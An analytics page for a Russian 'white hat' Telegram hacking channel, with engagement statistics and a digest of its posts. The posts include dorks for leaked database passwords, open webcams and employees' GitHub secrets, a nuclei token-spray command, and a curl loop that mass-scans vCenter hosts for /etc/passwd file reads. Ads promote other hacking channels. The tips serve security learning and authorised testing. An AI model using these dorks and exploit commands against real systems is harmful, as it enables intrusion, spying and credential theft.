White Hat

Open in Telegram

Пишем про информационную безопасность и белый хакинг. Сотрудничество: @workhouse_price Канал на бирже: https://telega.in/c/kind_hack Канал в реестре РКН: https://clck.ru/3FtTnR

Network:Этичный Хакер Russia55 585 Technologies & Applications10 597...

📈 Analytical overview of Telegram channel White Hat

Channel White Hat (@kind_hack) in the Russian language segment is an active participant. Currently, the community unites 11 791 subscribers, ranking 10 597 in the Technologies & Applications category and 55 585 in the Russia region.

📊 Audience metrics and dynamics

Since its creation on невідомо, the project has demonstrated rapid growth, gathering an audience of 11 791 subscribers.

According to the latest data from 25 June, 2026, the channel demonstrates stable activity. Although there has been a change in the number of participants by 384 over the last 30 days and by 13 over the last 24 hours, overall reach remains high.

Verification status: Not verified
Engagement rate (ER): The average audience engagement rate is 8.32%. Within the first 24 hours after publication, content typically collects 3.55% reactions from the total number of subscribers.
Post reach: On average, each post receives 981 views. Within the first day, a publication typically gains 419 views.
Reactions and interaction: The audience actively supports content: the average number of reactions per post is 4.
Thematic interests: Content is focused on key topics such as взлом, шпаргалка, обнаружение, протокол, хакер.

📝 Description and content policy

The author describes the resource as a platform for expressing subjective opinions:
“Пишем про информационную безопасность и белый хакинг. Сотрудничество: @workhouse_price Канал на бирже: https://telega.in/c/kind_hack Канал в реестре РКН: https://clck.ru/3FtTnR”

Thanks to the high frequency of updates (latest data received on 26 June, 2026), the channel maintains relevance and a high level of publication reach. Analytics show that the audience actively interacts with content, making it an important point of influence in the Technologies & Applications category.

11 791

Subscribers

+1324 hours

+737 days

+38430 days

981

Post views

~ 41924 hours

~ 54048 hours

8.32%

Engagement rate

~ 1

Posts per day

Ads index

beta

Posts Archive

11 796

Более 404 русскоязычных книг по ИБ и программированию можно найти на канале Айти книга Ничего лишнего. @itbook_library

11 796

🔎Скрипты и дорки для Netlas Разработчики Netlas (аналог Shodan) представили статью, в которой рассказывают об автоматизации поиска хостов с помощью своей консольной утилиты. Скрипты из статьи доступны на GitHub. Кроме того, нам любезно предоставили большую подборку дорков, ознакомиться с которой вы можете по данной ссылке. 💬 Ссылка на статью 💬 Ссылка на скрипты 💬 Ссылка на дорки #Dork

11 796

😡 Секретная методология GitHub доркинга 1. Что вы делаете в первую очередь, когда выполняете GitHub Dorking? Вы находите страницу своей цели на Github. 2. В 50% случаев не найдете утечек на их главной странице GitHub, но есть ли другие страницы, на которых можно попробовать найти что-то? Ответ - Да! Если вы перейдёте на GitHub своей цели и прокрутите вниз, то увидите вкладку «People». Это сотрудники, которые официально работают с вашей целью. 3. Теперь из вкладки «People» перейдите на страницу любого сотрудника. Всех сотрудников, упомянутых на вкладке «People» также можно проверить с помощью дорков Github для поиска конфиденциальной информации, относящейся к нашей цели. Таким образом, наша поверхность атаки становится значительно выше. Однако помните, что у этих сотрудников есть иная деятельность, нежели работа на исследуемую вами компанию, а это значит, что некоторые конфиденциальные утечки могут относиться к другим проектам, а не к вашей цели. 4. Иногда вы не можете найти утечки по сотрудникам на вкладке «People», не волнуйтесь, есть еще кое-что, что поможет вам увеличить поверхность атаки! Пробуем найти сотрудников извне. Например, с помощью дорка в гугл:

site:linkedin.com intext:"software engineer at название_компании"

Искать можно не только на LinkedIn. Думаю вы поняли основной принцип. Так вы найдете сотрудников, которые работают на вашу целевую компанию, но все еще не указаны на вкладке «People». Почему? Может быть, потому что они должны храниться в секрете, и они публикуют конфиденциальные материалы... Никогда не угадаешь. Теперь, когда вы нашли еще несколько сотрудников, нужно найти их страницы на Github. Обычно у всех разработчиков программного обеспечения есть страница на GitHub. Чтобы найти ее, посмотрите в описание профиля или используйте этот гугл-дорк:

site:github.com intext:тут_ник_сотрудника

Или просто напишите в поиске:

github тут_ник_сотрудника

#GitHub #Dork

11 796

🔑 Определяем принадлежность найденных ключей и токенов При пентесте сайтов мы зачастую ищем утечки в различных местах, включая GitHub, JS-файлы, HTTP-ответы, исходные коды и других местах. В результате, находится множество ключей и токенов. Если мы знаем к чему относится ключ, то можем поискать способы его эксплуатации в репозитории KeyHacks. Однако, бывают случаи, когда мы не знаем действительны ли найденные токены / ключи или к какой службе они принадлежат? Одним из способов определить это является атака Token Spray. По сути, в этой атаке мы берём найденный токен и пытаемся использовать его во всех подряд общеизвестных службах. Если где то сработает, то мы соответственно узнаем принадлежность этого ключа. Но так как вручную делать это долго и не интересно, мы можем использовать новые шаблоны в Nuclei (не забудьте обновиться). Для их использования достаточно выполнить:

nuclei -t ~/nuclei-templates/token-spray -var token=XXX_TOKEN_XXX

Или сохраните все токены в файл и выполните:

nuclei -t ~/nuclei-templates/token-spray -var token=token_list.txt

#Recon

11 796

💬 Чего следует избегать при работе на WordPress!

1.- Оставлять настройки по умолчанию.
2.- Допускать отсутствия контроля над публичным контентом и политиками.

Скрин ниже тому подтверждение. Найти подобные хосты можно с помощью Google дорка:

"define('DB_USER'," "define('DB_PASSWORD'," ext:txt

#WP

11 796

✈️ Поиск открытых веб-камер Ниже представлена небольшая подборка Google дорков для поиска открытых веб-камер:

allintitle: "Network Camera NetworkCamera" 

intitle:"EvoCam" inurl:"webcam.html" 

intitle:"Live View / - AXIS"

intitle:"LiveView / - AXIS" | inurl:view/view.shtml

intitle:"Live View / - AXIS" | inurl:/mjpg/video.mjpg?timestamp

inurl:axis-cgi/jpg

inurl:"MultiCameraFrame?Mode=Motion" 

inurl:/view.shtml 

inurl:/view/index.shtml 

"my webcamXP server!"

#Dorking

11 796

📚 Небольшая подборка онлайн лаб от Hackxpert Ниже представлена подборка лабораторий для практики поиска различных уязвимостей: 💬 Reflected XSS 💬 Stored XSS 💬 JWT 💬 RFI 💬 LFI 💬 Обход Captcha 💬 Обход панели входа админа 💬 Open redirects #web #lab

11 796

🔵 Нарушение процесса регистрации пользователя приложения за 10 минут Обход регистрации, захват аккаунта любого пользователя и выполнение действий от его имени с помощью изменений в своем личном кабинете. 💬 Ссылка на чтиво #ATO

11 796

🔬 Поиск внутренних служб в файлах JavaScript Если вы нашли SSRF, но не смогли получить доступ к внутренним веб-службам, всегда стоит заглянуть в файлы JavaScript, в частности в main.js или app.js. Осмотрите содержимое этих файлов по ключевым словам localhost, 127.0.0.1, host, port, и т.д., и вы можете найти скрытые внутренние ресурсы, к которым можно получить доступ через SSRF. #SSRF #JS

11 796

🟦 LFI, SSRF и XSS в VMware vCenter В VMware vCenter обнаружили ряд уязвимостей, среди которых несанкционированное чтение произвольных файлов, SSRF и XSS. Протестировано на версии 7.0.2.00100, информации про полный список уязвимых версий нет. Для поиска уязвимых хостов можно использовать однострочник:

cat target.txt| while read host do;do curl --insecure --path-as-is -s "$host/ui/vcav-bootstrap/rest/vcav-providers/provider-logo?url=file:///etc/passwd"| grep "root:x" && echo "$host Vulnerable";done

Дорк, который можно использовать для поиска в Shodan:

http.title:"ID_VC_Welcome"

Для поиска в Zoomeye:

app:"VMware vCenter"

#LFI #SSRF #XSS

11 796

🗂 Коллекция видео по эксплуатации уязвимостей веб-приложений Представленный ниже репозиторий содержит подборку видео по тестированию веб-приложений на различные уязвимости. Для удобства, содержимое разбито на категории, в зависимости от типа атак и уязвимостей. 💬 Ссылка на GitHub #Web

11 796

🇪🇺 Списки слов для фаззинга сайтов на разных языках При фаззинге сайта полезно учитывать его географическое положение и языковые особенности, а значит, следует использовать слова, которые присущи тем или иным языкам. Ниже представлены некоторые вордлисты, для различных языков: 💬 Infosec Wordlists 💬 Dirbuster Spanish 💬 Bip Spanish 💬 Türkçe Wordlist 💬 krypt0n wordlists 💬 Combined-Wordlists 💬 Common Web Managers Fuzz Wordlists 💬 Cracking French passwords #fuzz #wordlist

11 796

НИ ОДНА СИСТЕМА НЕ БЕЗОПАСНА Хотите в этом убедиться? Добро пожаловать в no system is safe. Админы канала - опытные безопасники, научат вас взламывать абсолютно все. От WI-FI и веб-сайтов до баз данных и умной техники. https://t.me/+nm9rOp33k1plNzIy

11 796

🫢 Инструменты для хакинга на Kali Linux В этой статье мы рассмотрим 20 лучших инструментов для хакинга на Kali Linux. Это подборка средств для аудита и взлома беспроводных сетей, проверки уязвимостей и разведки. 💬 Ссылка на чтиво #tools #kali

11 796

Топ 7 скриптов для сканера NMAP 🔗Dns — brute.nse 🔗Traceroute — отображает географическое местоположение цели. 🔗firewalk.nse — этот скрипт пытается узнать правила брандмауэра. 🔗Http-sitemap-generator.nse — Паук вэб-сервера который отображает структуру сайта, файлы и каталоги. 🔗HTTP-methods.nse — определяет какие параметры поддерживаются HTTP-сервером, отправив запрос OPTIONS. Он проверяет те методы, которые не указаны в заголовках OPTIONS, и видит, реализованы ли они. 🔗Whois-domain.nse — получает информацию о доменном имени цели. 🔗Shodan-api.nse — этот скрипт попросит API ключик для поисковика SHODAN. Выдаст всю информацию о хосте, которая имеется в SHODAN-e #usefl

11 796

Компьютерные сети - это основа для каждого IT-специалиста 💻 Network Admin — обучающий канал по сетевым технологиям. Много полезной информации: ➖ Основы компьютерных сетей ➖ Коммутация в сетях ➖ Маршрутизация трафика ➖ Беспроводные сети ➖ Сетевые протоколы Подпишись на канал 👇🏻 https://t.me/networkadminru

11 796

😈 Кража информации миллионов людей В этой статье представлен взлом веб-приложения с большим количеством пользователей. ➖ https://telegra.ph/Krazha-informacii-millionov-lyudej-12-22 #guide | 💀 Этичный хакер

11 796

Mr. Robot — обучение хакингу в простой и доступной форме. ➖ Видеокурсы, книги, гайды ➖ Osint, СИ, netstalking ➖ Практика Советуем подписаться — https://t.me/+He2UlZYleC44OTYy

11 796

🎚️ Совет по тестированию API У большинства API есть конечная точка для создания, удаления, обновления и чтения объекта или группы объектов. Если вы видите:

DELETE /api/item/32 (удаление)

То попробуйте:

POST /api/item (создание)
GET /api/item/33 (чтение)
PUT /api/item/33 (обновление)

Затем протестируйте каждый из них на IDOR, поочередно проверяя аутентификацию и уровни доступа к различным объектам. Методологическое тестирование - лучший способ взломать API. Иногда тестирование API усложняется тем, что мы можем не знать нужные для запроса поля или параметры. Однако есть способы найти их, например: если вы знаете поля для GET, вы так же можете отправить и PUT, изменив некоторые значения. Кроме того, есть инструменты, такие как Arjun, которые могут находить параметры, а иногда и сами API просто возвращают сообщения об ошибках, когда какой-то из параметров отсутствует.

11 796

⚡️ В Telegram появился первый архив нейросетей — Пакет Нейросетей Внутри доступны ИИ под любые задачи: для образования, работы, развлечений и творчества. Например: • 12 нейросетей в одном посте (SMM, дизайн, таргет, CEO, программирование и даже генератор Reels'ов для Инсты) • Первый в мире конструктор нейросетей (да, вы можете создать свою по запросу) • И даже Dream Interpreter AI, визуализирующий ваши сны. Обновления, анонсы новых проектов и всё-всё про нейросети тоже здесь. Подписывайтесь!